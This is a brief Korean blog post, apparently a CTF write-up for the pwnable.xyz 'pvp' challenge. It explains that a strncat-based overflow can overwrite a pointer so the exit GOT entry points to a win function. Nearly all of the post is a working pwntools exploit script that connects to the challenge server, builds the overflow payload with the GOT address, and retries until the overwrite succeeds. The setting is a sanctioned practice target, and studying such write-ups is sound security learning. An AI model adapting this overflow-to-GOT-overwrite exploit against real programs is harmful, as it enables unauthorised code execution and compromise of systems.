너무 멍청했다 말하기도 쪽팔린다strncpy가 널바이트가 나올때까지 복사된다고 생각했다
strncay으로 포인터를 덮을 수 있고 exit got함수를 win함수로 덮어서 시그널 터질때 플래그가 출력되도록했다
from pwn import *
#context.log_level = "debug"
exit_got = 0x6020a0
def save():
p.recvuntil(b"> ")
p.sendline(b"4")
p.recvuntil(b"message? ")
p.sendline(b"3")
def append(arr, func_type):
p.recvuntil(b"> ")
p.sendline(str(func_type))
p.recvuntil(b"me ")
num = int(p.recvuntil(b" "))
if num == 0:
return 0
elif num > len(arr):
num = num - len(arr)
elif num == 1:
p.send(b"\x00")
return 0
pay = arr[:num -1 ]
pay += b"\x00"
p.send(pay)
return num - 1
payload = b"\x2d\x0b\x40"
payload += b"A" * (0x400 - 3)
payload += p64(exit_got)
num = 0
total_len = 0
while True:
total_len = 0
p = remote("svc.pwnable.xyz", 30022)
#p = process("./pvp")
num = append(payload, 2)
print("long num: " + hex(num))
if num < 0x100:
p.close()
else:
total_len += num
payload = payload[num:]
while True:
num = append(payload, 1)
payload = payload[num:]
total_len += num
print(total_len)
if total_len >= 0x408:
break
break
save()
p.interactive()'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / Punch it (0) | 2022.05.22 |
|---|---|
| pwnable.xyz / catalog (0) | 2022.05.21 |
| pwnable.xyz / bookmark (0) | 2022.05.21 |
| pwnable.xyz / attack (0) | 2022.05.21 |
| pwnable.xyz / rwsr (0) | 2022.05.20 |
